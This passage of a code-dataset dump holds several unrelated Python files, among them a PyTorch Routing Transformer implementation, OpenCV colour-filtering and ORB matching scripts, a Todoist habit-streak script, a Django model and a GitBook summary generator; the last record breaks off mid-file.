RelativePositionalEmbedding(head_dim, heads, bucket_size * 2) if rel_pos_emb 
else None\n\n def forward(self, q, k, v, input_mask = None):\n shape = q.shape\n\n merge_into_batch = lambda t: t.reshape(-1, *t.shape[-2:])\n q, k, v = map(merge_into_batch, (q, k, v))\n\n b, t, e, h, device, dtype = *q.shape, self.heads, q.device, q.dtype\n bucket_size, causal, look_backward, look_forward, shared_qk = self.bucket_size, self.causal, self.look_backward, self.look_forward, self.shared_qk\n\n buckets = t // bucket_size\n\n if shared_qk:\n k = F.normalize(k, 2, dim=-1).type(q.type())\n\n ticker = torch.arange(t, device=device, dtype=dtype)[None, :]\n b_t = ticker.reshape(1, buckets, bucket_size)\n\n bucket_fn = lambda t: t.reshape(b, buckets, bucket_size, -1)\n bq, bk, bv = map(bucket_fn, (q, k, v))\n\n look_around_kwargs = {'backward': look_backward, 'forward': look_forward}\n bk = look_around(bk, **look_around_kwargs)\n bv = look_around(bv, **look_around_kwargs)\n\n bq_t = b_t\n bq_k = look_around(b_t, **look_around_kwargs)\n\n dots = torch.einsum('bhie,bhje->bhij', bq, bk) * (e ** -0.5)\n\n if self.rel_pos is not None:\n rel_attn = self.rel_pos(bq.view(-1, h, *bq.shape[1:])).reshape_as(dots)\n dots = dots + rel_attn\n\n mask_value = max_neg_value(dots)\n\n if shared_qk:\n mask = bq_t[:, :, :, None] == bq_k[:, :, None, :]\n dots.masked_fill_(mask, TOKEN_SELF_ATTN_VALUE)\n del mask\n\n if causal:\n mask = bq_t[:, :, :, None] < bq_k[:, :, None, :]\n dots.masked_fill_(mask, mask_value)\n del mask\n\n mask = bq_k[:, :, None, :] == -1\n dots.masked_fill_(mask, mask_value)\n del mask\n\n if input_mask is not None:\n h = b // input_mask.shape[0]\n input_mask = input_mask.reshape(-1, buckets, bucket_size)\n mq = mk = input_mask\n mk = look_around(mk, pad_value=False, **look_around_kwargs)\n mask = (mq[:, :, :, None] * mk[:, :, None, :])\n mask = merge_dims(0, 1, expand_dim(mask, 1, h))\n dots.masked_fill_(~mask, mask_value)\n del mask\n\n attn = dots.softmax(dim=-1)\n attn = self.dropout(attn)\n\n out = torch.einsum('bhij,bhje->bhie', attn, bv)\n out = out.reshape(*shape)\n return out\n\n# kmeans related function and class\n\ndef update_kmeans_on_backwards(module):\n module.kmean_modules = find_modules(module, Kmeans)\n def hook(_, grad_in, grad_out):\n for m in module.kmean_modules:\n m.update()\n\n return module.register_backward_hook(hook)\n\ndef similarity(x, means):\n return torch.einsum('bhld,hcd->bhlc', x, means)\n\ndef dists_and_buckets(x, means):\n dists = similarity(x, means)\n _, buckets = torch.max(dists, dim=-1)\n return dists, buckets\n\ndef batched_bincount(index, num_classes, dim=-1):\n shape = list(index.shape)\n shape[dim] = num_classes\n out = index.new_zeros(shape)\n out.scatter_add_(dim, index, torch.ones_like(index, dtype=index.dtype))\n return out\n\ndef kmeans_iter(x, means, buckets = None):\n b, h, l, d, dtype, num_clusters = *x.shape, x.dtype, means.shape[1]\n\n if buckets is None:\n _, buckets = dists_and_buckets(x, means)\n\n bins = batched_bincount(buckets, num_clusters).sum(0, keepdim=True)\n zero_mask = bins.long() == 0\n\n means_ = buckets.new_zeros(b, h, num_clusters, d, dtype=dtype)\n means_.scatter_add_(-2, expand_dim(buckets, -1, d), x)\n means_ = F.normalize(means_.sum(0, keepdim=True), dim=-1).type(dtype)\n\n means = torch.where(zero_mask.unsqueeze(-1), means, means_)\n means = means.squeeze(0)\n return means\n\ndef distribution(dists, window_size):\n _, topk_indices = dists.topk(k=window_size, dim=-2)\n indices = topk_indices.transpose(-2, -1)\n return indices.reshape(*indices.size()[:2], -1)\n\nclass Kmeans(nn.Module):\n def __init__(self, 
num_heads, head_dim, num_clusters, ema_decay = 0.999, commitment = 1e-4):\n super().__init__()\n self.commitment = commitment\n self.ema_decay = ema_decay\n\n self.register_buffer('means', torch.randn(num_heads, num_clusters, head_dim))\n self.register_buffer('initted', torch.tensor(False))\n self.num_new_means = 0\n self.new_means = None\n\n @torch.no_grad()\n def init(self, x):\n if self.initted:\n return\n _, h, _, d, device, dtype = *x.shape, x.device, x.dtype\n\n num_clusters = self.means.shape[1]\n\n means = x.transpose(0, 1).contiguous().view(h, -1, d)\n num_samples = means.shape[1]\n\n if num_samples >= num_clusters:\n indices = torch.randperm(num_samples, device=device)[:num_clusters]\n else:\n indices = torch.randint(0, num_samples, (num_clusters,), device=device)\n\n means = means[:, indices]\n\n for _ in range(KMEAN_INIT_ITERS):\n means = kmeans_iter(x, means)\n\n self.num_new_means = 0\n self.means.data.copy_(means)\n self.initted.data.copy_(torch.tensor(True))\n\n @torch.no_grad()\n def update(self, new_means = None):\n new_means = default(new_means, self.new_means)\n assert new_means is not None, 'new kmeans has not been supplied'\n ema_inplace(self.means, new_means, self.ema_decay)\n\n del self.new_means\n self.new_means = None\n self.num_new_means = 0\n\n def forward(self, x, update_means = False):\n self.init(x)\n\n b, dtype = x.shape[0], x.dtype\n means = self.means.type(dtype)\n x = F.normalize(x, 2, dim=-1).type(dtype)\n\n with torch.no_grad():\n dists, buckets = dists_and_buckets(x, means)\n\n routed_means = batched_index_select(expand_dim(means, 0, b), buckets)\n loss = F.mse_loss(x, routed_means) * self.commitment\n\n if update_means:\n with torch.no_grad():\n means = kmeans_iter(x, means, buckets)\n self.new_means = ema(self.new_means, means, self.num_new_means / (self.num_new_means + 1))\n self.num_new_means += 1\n\n return dists, loss\n\n# kmeans attention class\n\nclass KmeansAttention(nn.Module):\n def __init__(self, num_clusters, window_size, num_heads, head_dim, causal = False, dropout = 0., ema_decay = 0.999, commitment = 1e-4, context_window_size = None, receives_context = False, num_mem_kv = 0, shared_qk = False):\n super().__init__()\n self.num_heads = num_heads\n self.num_clusters = num_clusters\n self.head_dim = head_dim\n\n self.window_size = window_size\n self.context_window_size = default(context_window_size, window_size)\n self.causal = causal\n\n self.shared_qk = shared_qk\n self.receives_context = receives_context\n self.kmeans = Kmeans(num_heads, head_dim, num_clusters, ema_decay, commitment)\n self.dropout = nn.Dropout(dropout)\n\n self.num_mem_kv = max(num_mem_kv, 1 if causal and not shared_qk else 0)\n self.mem_key = nn.Parameter(torch.randn(num_heads, num_clusters, self.num_mem_kv, head_dim))\n self.mem_value = nn.Parameter(torch.randn(num_heads, num_clusters, self.num_mem_kv, head_dim))\n\n def forward(self, q, k, v, query_mask = None, key_mask = None, **kwargs):\n b, h, t, d, kv_t, wsz, c_wsz, nc, device, dtype = *q.shape, k.shape[2], self.window_size, self.context_window_size, self.num_clusters, q.device, q.dtype\n is_reverse = kwargs.pop('_reverse', False)\n\n out = torch.zeros_like(q, dtype=dtype)\n\n update_kmeans = self.training and not is_reverse\n \n key_mask = default(key_mask, query_mask) if not self.receives_context else key_mask\n kv_wsz = wsz if not self.receives_context else c_wsz\n\n wsz = min(wsz, t)\n kv_wsz = min(kv_wsz, kv_t)\n\n if not self.shared_qk or self.receives_context:\n dists, aux_loss = self.kmeans(torch.cat((q, 
k), dim=2), update_kmeans)\n q_dists, k_dists = split_at_index(2, t, dists)\n indices = distribution(q_dists, wsz)\n kv_indices = distribution(k_dists, kv_wsz)\n else:\n dists, aux_loss = self.kmeans(q, update_kmeans)\n k = F.normalize(k, dim=-1).to(q)\n indices = distribution(dists, wsz)\n kv_indices = indices\n\n q = batched_index_select(q, indices)\n k = batched_index_select(k, kv_indices)\n v = batched_index_select(v, kv_indices)\n\n reshape_with_window = lambda x: x.reshape(b, h, nc, -1, d)\n q, k, v = map(reshape_with_window, (q, k, v))\n\n m_k, m_v = map(lambda x: expand_dim(x, 0, b).to(q), (self.mem_key, self.mem_value))\n k, v = map(lambda x: torch.cat(x, dim=3), ((m_k, k), (m_v, v)))\n\n dots = torch.einsum('bhnid,bhnjd->bhnij', q, k) * (d ** -0.5)\n\n mask_value = max_neg_value(dots)\n\n if query_mask is not None or key_mask is not None:\n query_mask = default(query_mask, lambda: torch.ones((b, t), device=device).bool())\n key_mask = default(key_mask, lambda: torch.ones((b, kv_t), device=device).bool())\n\n q_mask = expand_dim(query_mask, 1, h).gather(2, indices)\n kv_mask = expand_dim(key_mask, 1, h).gather(2, kv_indices)\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (q_mask, kv_mask))\n mask = q_mask[:, :, :, :, None] * kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=True)\n dots.masked_fill_(~mask, mask_value)\n del mask\n\n if self.causal:\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (indices, kv_indices))\n mask = q_mask[:, :, :, :, None] >= kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=True)\n dots.masked_fill_(~mask, mask_value)\n del mask \n\n if self.shared_qk:\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (indices, kv_indices))\n mask = q_mask[:, :, :, :, None] == kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=False)\n dots.masked_fill_(mask, TOKEN_SELF_ATTN_VALUE)\n del mask\n\n dots = dots.softmax(dim=-1)\n dots = self.dropout(dots)\n\n bo = torch.einsum('bhcij,bhcjd->bhcid', dots, v)\n so = torch.reshape(bo, (b, h, -1, bo.shape[-1])).type(dtype)\n out = scatter_mean(out, so, indices.unsqueeze(-1).expand_as(so), -2)\n return out, aux_loss\n\n# feedforward\n\nclass GELU_(nn.Module):\n def forward(self, x):\n return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n\nGELU = nn.GELU if hasattr(nn, 'GELU') else GELU_\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, mult = 4, dropout = 0., activation = None, glu = False):\n super().__init__()\n activation = default(activation, GELU)\n\n self.glu = glu\n self.w1 = nn.Linear(dim, dim * mult * (2 if glu else 1))\n self.act = activation()\n self.dropout = nn.Dropout(dropout)\n self.w2 = nn.Linear(dim * mult, dim)\n\n def forward(self, x, **kwargs):\n if not self.glu:\n x = self.w1(x)\n x = self.act(x)\n else:\n x, v = self.w1(x).chunk(2, dim=-1)\n x = self.act(x) * v\n\n x = self.dropout(x)\n x = self.w2(x)\n return x\n\n# self attention\n\nclass SelfAttention(nn.Module):\n def __init__(self, dim, depth, max_seq_len, heads, local_attn_heads, window_size, local_attn_window_size = None, causal = False, attn_dropout = 0., dropout = 0., kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, rel_pos_emb = True, num_mem_kv = 0, shared_qk = False):\n super().__init__()\n assert (dim % heads) == 0, 'hidden dimension must be divisible by number of heads'\n assert (max_seq_len % window_size) == 0, 'maximum sequence 
length must be divisible by the target window size'\n assert local_attn_heads <= heads, 'number of local attention heads must be less than total heads'\n assert not (receives_context and local_attn_heads > 0), 'local attention cannot be used for self attention with context'\n assert not (receives_context and causal), 'contextual attention layer cannot be causal'\n\n local_attn_window_size = default(local_attn_window_size, window_size // 2)\n context_window_size = default(context_window_size, window_size)\n\n self.shared_qk = shared_qk\n self.receives_context = receives_context\n self.heads = heads\n self.local_attn_heads = local_attn_heads\n self.global_attn_heads = heads - local_attn_heads\n\n self.window_size = window_size\n\n head_dim = dim // heads\n num_clusters = max_seq_len // window_size\n\n if self.local_attn_heads > 0:\n self.local_attn = LocalAttention(local_attn_window_size, local_attn_heads, head_dim, causal = True, dropout = attn_dropout, rel_pos_emb = rel_pos_emb, shared_qk = shared_qk)\n\n if self.global_attn_heads > 0:\n self.global_attn = KmeansAttention(num_clusters, window_size, self.global_attn_heads, head_dim, causal = causal, dropout = attn_dropout, ema_decay = kmeans_ema_decay, commitment = commitment_factor, receives_context = receives_context, num_mem_kv = num_mem_kv, shared_qk = shared_qk)\n\n self.to_q = nn.Linear(dim, dim, bias = False)\n self.to_v = nn.Linear(dim, dim, bias = False)\n self.to_out = nn.Linear(dim, dim, bias = False)\n\n if not self.shared_qk:\n self.to_k = nn.Linear(dim, dim, bias = False)\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, context = None, input_mask = None, context_mask = None, **kwargs):\n assert not (self.receives_context and context is None), 'context must be passed if self attention is set to receive context'\n b, t, e, h = *x.shape, self.heads\n head_dim = e // self.heads\n\n split_heads = lambda v: v.reshape(b, -1, h, head_dim).transpose(1, 2).contiguous()\n\n kv_input = x if not self.receives_context else context\n\n q, v = self.to_q(x), self.to_v(kv_input)\n\n if not self.shared_qk:\n k = self.to_k(kv_input)\n else:\n k = self.to_q(kv_input) if self.receives_context else q\n\n q, k, v = map(split_heads, (q, k, v))\n\n split_index_fn = partial(split_at_index, 1, self.local_attn_heads)\n (lq, q), (lk, k), (lv, v) = map(split_index_fn, (q, k, v))\n has_local, has_global = map(lambda x: x.shape[1] > 0, (lq, q))\n\n out = []\n total_loss = torch.tensor(0., requires_grad=True, **to(x))\n\n if has_local:\n local_out = self.local_attn(lq, lk, lv, input_mask = input_mask)\n out.append(local_out)\n\n if has_global:\n global_out, loss = self.global_attn(q, k, v, query_mask = input_mask, key_mask = context_mask)\n total_loss = total_loss + loss\n\n out.append(global_out)\n\n out = torch.cat(out, dim=1)\n out = out.reshape(b, h, t, -1).transpose(1, 2).reshape(b, t, -1)\n out = self.to_out(out)\n return self.dropout(out), total_loss\n\nclass RoutingTransformer(nn.Module):\n def __init__(self, dim, depth, max_seq_len, heads = 8, window_size = 64, local_attn_window_size = None, causal = False, weight_tie = False, attn_dropout = 0., ff_dropout = 0., attn_layer_dropout = 0., layer_dropout = 0., n_local_attn_heads = 0, ff_glu = False, reversible = False, ff_chunks = 1, kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, _register_kmeans_update = False, rel_pos_emb = True, pkm_layers = tuple(), pkm_num_keys = 128, num_mem_kv = 0, shared_qk = None, context_shared_qk = 
False):\n super().__init__()\n shared_qk = default(shared_qk, causal) # default to shared qk when causal, due to experimental results\n\n local_attn_window_size = default(local_attn_window_size, window_size // 2)\n if type(n_local_attn_heads) is not tuple:\n n_local_attn_heads = tuple([n_local_attn_heads] * depth)\n\n assert len(n_local_attn_heads) == depth, 'local attention heads tuple must have the same length as the depth'\n assert all([(local_heads <= heads) for local_heads in n_local_attn_heads]), 'number of local attn heads must be less than the maximum number of heads'\n\n layers = nn.ModuleList([])\n fn_wrapper = partial(PreNorm, dim)\n\n get_attn = lambda local_heads: SelfAttention(dim, depth, max_seq_len, heads, local_heads, window_size, causal = causal, local_attn_window_size = local_attn_window_size, attn_dropout = attn_dropout, dropout = attn_layer_dropout, kmeans_ema_decay = kmeans_ema_decay, commitment_factor = commitment_factor, rel_pos_emb = rel_pos_emb, num_mem_kv = num_mem_kv, shared_qk = shared_qk)\n get_ff = lambda: Chunk(ff_chunks, FeedForward(dim, dropout = ff_dropout, glu = ff_glu), along_dim=1)\n get_context_attn = lambda: SelfAttention(dim, depth, max_seq_len, heads, 0, window_size, local_attn_window_size = local_attn_window_size, attn_dropout = attn_dropout, dropout = attn_layer_dropout, kmeans_ema_decay = kmeans_ema_decay, commitment_factor = commitment_factor, receives_context = True, context_window_size = context_window_size, num_mem_kv = num_mem_kv, shared_qk = context_shared_qk)\n get_context_ff = lambda: Chunk(ff_chunks, FeedForward(dim, dropout = ff_dropout, glu = ff_glu), along_dim=1)\n get_pkm = lambda: PKM(dim, num_keys = pkm_num_keys)\n\n if weight_tie:\n assert len(set(n_local_attn_heads)) == 1, 'you can only weight tie if number of local attention heads for all layers is the same'\n get_attn, get_ff, get_context_attn, get_context_ff, get_pkm = map(cache_fn, (get_attn, get_ff, get_context_attn, get_context_ff, get_pkm))\n\n for ind, local_heads in zip(range(depth), n_local_attn_heads):\n layer = ind + 1\n use_ff = layer not in cast_tuple(pkm_layers)\n get_parallel_fn = get_ff if use_ff else get_pkm\n\n layers.append(nn.ModuleList([\n fn_wrapper(get_attn(local_heads)),\n fn_wrapper(get_parallel_fn())\n ]))\n\n if not receives_context:\n continue\n\n layers.append(nn.ModuleList([\n fn_wrapper(get_context_attn()),\n fn_wrapper(get_context_ff())\n ]))\n\n execute_type = ReversibleSequence if reversible else SequentialSequence\n\n attn_context_layer = ((True, False),) if receives_context else tuple()\n route_attn = ((True, False), *attn_context_layer) * depth\n route_context = ((False, False), *attn_context_layer) * depth\n\n context_route_map = {'context': route_context, 'context_mask': route_context} if receives_context else {}\n attn_route_map = {'input_mask': route_attn}\n self.layers = execute_type(layers, args_route = {**attn_route_map, **context_route_map}, layer_dropout = layer_dropout)\n\n if _register_kmeans_update:\n update_kmeans_on_backwards(self)\n\n has_local_attn = any([num > 0 for num in n_local_attn_heads])\n self.pad_to_multiple = local_attn_window_size if has_local_attn else 0\n\n def forward(self, x, **kwargs):\n x, loss = self.layers(x, **kwargs)\n return x, loss\n\nclass RoutingTransformerLM(nn.Module):\n def __init__(self, num_tokens, dim, depth, max_seq_len, heads = 8, window_size = 64, local_attn_window_size = None, causal = False, emb_dim = None, weight_tie = False, attn_dropout = 0., ff_dropout = 0., attn_layer_dropout = 0., 
layer_dropout = 0., ff_mult = 4, ff_activation = None, ff_glu = False, return_embeddings = False, n_local_attn_heads = 0, reversible = False, ff_chunks = 1, kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, rel_pos_emb = True, _register_kmeans_update = True, pkm_layers = tuple(), pkm_num_keys = 128, num_mem_kv = 0, shared_qk = None, context_shared_qk = False):\n super().__init__()\n assert (max_seq_len % window_size) == 0, 'max sequence length must be divisible by the window size, to calculate number of kmeans cluster'\n emb_dim = default(emb_dim, dim)\n self.max_seq_len = max_seq_len\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.axial_pos_emb = AxialPositionalEmbedding(emb_dim, axial_shape=(max_seq_len // window_size, window_size))\n self.routing_transformer = RoutingTransformer(dim, depth, max_seq_len, heads = heads, window_size = window_size, local_attn_window_size = local_attn_window_size, causal = causal, weight_tie = weight_tie, ff_dropout = ff_dropout, attn_dropout = attn_dropout, attn_layer_dropout = attn_layer_dropout, layer_dropout = layer_dropout, n_local_attn_heads = n_local_attn_heads, ff_glu = ff_glu, reversible = reversible, ff_chunks = ff_chunks, kmeans_ema_decay = kmeans_ema_decay, receives_context = receives_context, context_window_size = context_window_size, rel_pos_emb = rel_pos_emb, pkm_layers = pkm_layers, pkm_num_keys = pkm_num_keys, num_mem_kv = num_mem_kv, shared_qk = shared_qk, context_shared_qk = context_shared_qk, _register_kmeans_update = _register_kmeans_update)\n\n if emb_dim != dim:\n self.routing_transformer = ProjectInOut(self.routing_transformer, emb_dim, dim, project_out = not return_embeddings)\n\n self.out = nn.Linear(emb_dim, num_tokens) if not return_embeddings else identity\n\n def forward(self, x, **kwargs):\n x = self.token_emb(x)\n x = x + self.axial_pos_emb(x)\n x, loss = self.routing_transformer(x, **kwargs)\n return self.out(x), loss\n","sub_path":"routing_transformer/routing_transformer.py","file_name":"routing_transformer.py","file_ext":"py","file_size_in_byte":27337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"312323302","text":"\"\"\"\nThe universal HSV range is ([0-359,0-100,0-100])\nBut in OpenCV the HSV range is ([0-179,0-255,0-255])\nSo we need to normalize it:\n1. For H we just need to divide by 2.\n    Example-340 in U-HSV will be 170 in cv-HSV\n2. For S and V we multiply the U-HSV percentage by 2.55: cv-HSV value = U-HSV(%) * 2.55\n    Example-55% in U-HSV will be = 55 * 2.55 = 140.25 ~ 140\n\"\"\"
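\n# Added for illustration (not part of the original script): a tiny helper that\n# applies the normalization described above; the name uhsv_to_cvhsv is hypothetical.\ndef uhsv_to_cvhsv(h, s, v):\n # H: 0-359 -> 0-179 (halve it); S and V: 0-100 % -> 0-255 (scale by 2.55)\n return int(h / 2), int(round(s * 2.55)), int(round(v * 2.55))\n\n# e.g. uhsv_to_cvhsv(340, 55, 55) -> (170, 140, 140)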
\nimport cv2\nimport numpy as np\nimport os\n\npath='/home/pranjal/Desktop/RM/RM-Coding-kids/Pranjal/OpenCV/Object_Filtering'\ncap=cv2.VideoCapture(0)\nwhile True:\n ret,frame=cap.read()\n frame=cv2.flip(frame,1)\n blur = cv2.GaussianBlur(frame,(11,11),0)\n HSV_frame =cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n\n\n#For Blue Screw driver head\n #low_blue=np.array([90,80,50]) #just making an array\n #high_blue=np.array([120,255,255])\n\n#For yellow cap\n low_orange=np.array([20,100,100]) #just making an array\n high_orange=np.array([30,255,255])\n\n mask=cv2.inRange(HSV_frame,low_orange,high_orange) #Thresholding within limits\n\n kernel = np.ones((5,5),np.uint8)\n img_erosion = cv2.erode(mask, kernel, iterations=1)\n img_dilation = cv2.dilate(img_erosion, kernel, iterations=1)\n\n\n res = cv2.bitwise_and(frame,frame,mask= img_dilation)\n#Contouring or outlining\n (cnts,_) = cv2.findContours(img_dilation.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(res,cnts,-1,(0,200,0),3)\n\n for c in cnts:\n # get the bounding rect\n x, y, w, h = cv2.boundingRect(c)\n # draw a green rectangle to visualize the bounding rect\n cv2.rectangle(res, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow('C',res)\n var=cv2.waitKey(1)\n if var == ord('q'):\n break\n \ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Second_Years/Pranjal/OpenCV/Object_Filtering/Filter_objects_HSV.py","file_name":"Filter_objects_HSV.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"382815989","text":"#Challenge 2\n#Created by: Zach Golik\n\nword1=('the')\nword2=('cat')\nword3=('sat')\nword4=('on')\nword5=('the')\nword6=('mat')\n\nprint(word1, word2, word3, word4, word5, word6)\n#Completed successfully? Yes\n#Did you have any errors? Yes, simple logic errors\n#How did you solve them? Made it simpler\n#What did you find difficult?
Nothing\n","sub_path":"Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"639612369","text":"import os\nimport re\nimport logging\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse\nfrom todoist.api import TodoistAPI\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef get_token():\n token = os.getenv('TODOIST_APIKEY')\n return token\n\n\ndef get_project(api):\n project = os.getenv('TODOIST_PROJECT')\n if not project:\n return None\n for p in api.state['projects']:\n if p['name'] == project:\n return p['id']\n\n\ndef is_habit(text):\n return re.search(r'\\[day\\s(\\d+)\\]', text)\n\n\ndef update_streak(item, streak):\n days = '[day {}]'.format(streak)\n text = re.sub(r'\\[day\\s(\\d+)\\]', days, item['content'])\n item.update(content=text)\n\n\ndef main():\n API_TOKEN = get_token()\n today = datetime.utcnow().replace(tzinfo=None)\n if not API_TOKEN:\n logging.error('Please set the API token in environment variable.')\n exit()\n api = TodoistAPI(API_TOKEN)\n api.sync()\n project_id = get_project(api)\n tasks = api.state['items']\n for task in tasks:\n content = task['content']\n if all([\n task['due_date_utc'],\n is_habit(content),\n not project_id or task['project_id'] == project_id\n ]):\n logger.info(\"Found task id:%s content:%s\", task['id'], content[:20])\n date_string = task['date_string'] or 'ev day'\n task_id = task['id']\n due_at = parse(task['due_date_utc'], ignoretz=True)\n days_left = due_at.date() - today.date()\n if days_left:\n habit = is_habit(content)\n streak = int(habit.group(1)) + 1\n update_streak(task, streak)\n api.notes.add(task_id, '[BOT] Streak extended. 
Yay!')\n else:\n update_streak(task, 0)\n task.update(date_string=date_string + ' starting tod')\n api.notes.add(task_id, '[BOT] Chain broken :(')\n api.commit()\n\nif __name__ == '__main__':\n main()\n","sub_path":"habits.py","file_name":"habits.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"475296891","text":"__author__ = 'ugrend'\nfrom apscheduler.scheduler import Scheduler\n\nclass scheduler():\n\n\n def checkCouchPotatoStatus(self):\n from movielist.core.couchpotato import CouchPotato\n cp = CouchPotato(self.settings)\n cp.checkAllStatus()\n\n def getMoviePone(self):\n from movielist.core.datamining.moviefone import moviepone\n mp = moviepone()\n mp.insertFone()\n for m in range(1, 13):\n mp.insertFone(m)\n\n\n def __init__(self,settings):\n self.settings = settings\n self.sched = Scheduler()\n self.sched.start()\n\n\n\n\n\n\n\n","sub_path":"movielist/core/scheduler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"597051910","text":"# -*- coding: utf-8 -*-\n\n# Python's Libraries\nfrom __future__ import unicode_literals\n\n# Django's Libraries\nfrom django.db import models\n\n# Third-party Libraries\nfrom django_resized import ResizedImageField\n\n# Own's Libraries\nfrom .utilities import Helper\nfrom security.models import Profile\n\n\nclass Post(models.Model):\n\n STATUS = (\n ('PUB', 'PUBLICADO'),\n ('EDT', 'Editando'),\n )\n\n title = models.CharField(\"Titulo\", max_length=120)\n image = ResizedImageField(\n \"Imagen\",\n upload_to=Helper.get_ImagePath_Post,\n quality=75,\n blank=True,\n validators=[\n Helper.validate_Img_Extension,\n Helper.validate_Size\n ]\n )\n content = models.TextField(\"Contenido\", blank=True)\n\n status = models.CharField(\n \"Estado\",\n max_length=3,\n choices=STATUS,\n default=\"EDT\"\n )\n created_by = models.ForeignKey(\n Profile,\n verbose_name=\"Creado por\",\n related_name='post_created_by',\n null=True\n )\n created_date = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated_by = models.ForeignKey(\n Profile,\n verbose_name=\"Actualizado por\",\n related_name='post_updated_by',\n null=True\n )\n updated_date = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n def __unicode__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Publicación'\n verbose_name_plural = 'Publicaciones'\n","sub_path":"editorial/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"193314604","text":"from path import Path\nimport os\n
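\n# Added note (not in the original script): this builds GitBook-style tables of\n# contents -- a root README.md and SUMMARY.md, plus a README.md per top-level\n# directory, each linking the files found inside it.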
\nroot = Path('.')\nf_root = open(root / 'README.md', 'w')\nf_root.write('## Introduction' + os.linesep + os.linesep)\nf_root.close()\nf_summary = open(root / 'SUMMARY.md', 'w')\nf_summary.write('# Introduction' + os.linesep + os.linesep + '* [Introduction](README.md)' + os.linesep)\nf_summary.close()\nf_root = open(root / 'README.md', 'a')\nf_summary = open(root / 'SUMMARY.md', 'a')\nfor dir in root.dirs():\n if dir.stem != '_book' and dir.stem != '.git':\n f = open(dir / 'README.md', 'w')\n f.write('## ' + dir.stem.replace('-', ' ').upper() + os.linesep + os.linesep)\n f.close()\n f_summary.write(os.linesep + '# ' + dir.stem.replace('-', ' ').upper() + os.linesep + os.linesep)\n f_root.write('* [' + dir.stem.replace('-', ' ').upper() + ']' + '(' + dir.stem + '/README.md)' + os.linesep)\n f_summary.write('* [' + dir.stem.replace('-', ' ').upper() + ']' + '(' + dir.stem + '/README.md)' + os.linesep)\n for file in dir.files():\n print(file)\n if file.stem != 'img' and file.stem != 'README':\n f = open(dir / 'README.md', 'a')\n f.write('* [' + file.stem.replace('-', ' ') + '](' + file.basename() + ')' + os.linesep)\n f_summary.write(' * [' + file.stem.replace('-', ' ') + '](' + dir.stem + '/' + file.basename() + ')' + os.linesep)\n\nf_root.close()\nf_summary.close()\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"594091847","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimport skimage.measure\nfrom skimage import io\nfrom settings import *\n\npath = './img/enemy1/sample/'\n\n\ndef Capture():\n game = game_default(False)\n \n game.init()\n tempPicture = game.get_state().screen_buffer\n \n #plt.imshow(tempPicture)\n #plt.show()\n\n game.close()\n saveImg(tempPicture)\n \n print('finish!')\ndef ORB(img):\n #Initiate ORB detector\n orb = cv.ORB_create()\n # find the keypoints with ORB\n kp = orb.detect(img,None)\n # compute the descriptors with ORB\n kp, des = orb.compute(img, kp)\n # draw only keypoints location,not size and orientation\n img2 = cv.drawKeypoints(img, kp, None, color=(0,255,0), flags=0)\n #plt.imshow(img2,cmap='gray'), plt.show()\n # plt displays RGB while OpenCV loads BGR, so convert before showing\n plt.axis(\"off\")\n plt.imshow(img2),plt.show()\n #plt.imshow(cv.cvtColor(img2, cv.COLOR_BGR2RGB)), plt.show()\n\ndef orb_compare():\n \n \n \n img1 = cv.imread(path+'e1_rgb.png')\n img2 = cv.imread(path+'7.jpg')\n #gray\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n \n orb = cv.ORB_create()\n\n kp1 = orb.detect(img1,None)\n kp2 = orb.detect(img2,None)\n kp1, des1 = orb.compute(img1, kp1)\n kp2, des2 = orb.compute(img2, kp2)\n\n bf = cv.BFMatcher(cv.NORM_HAMMING, crossCheck=True)\n matches = bf.match(des1, des2)\n matches = sorted(matches, key=lambda x: x.distance)\n img3 = cv.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=2)\n plt.imshow(cv.cvtColor(img3, cv.COLOR_BGR2RGB)), plt.show()\n\n\ndef 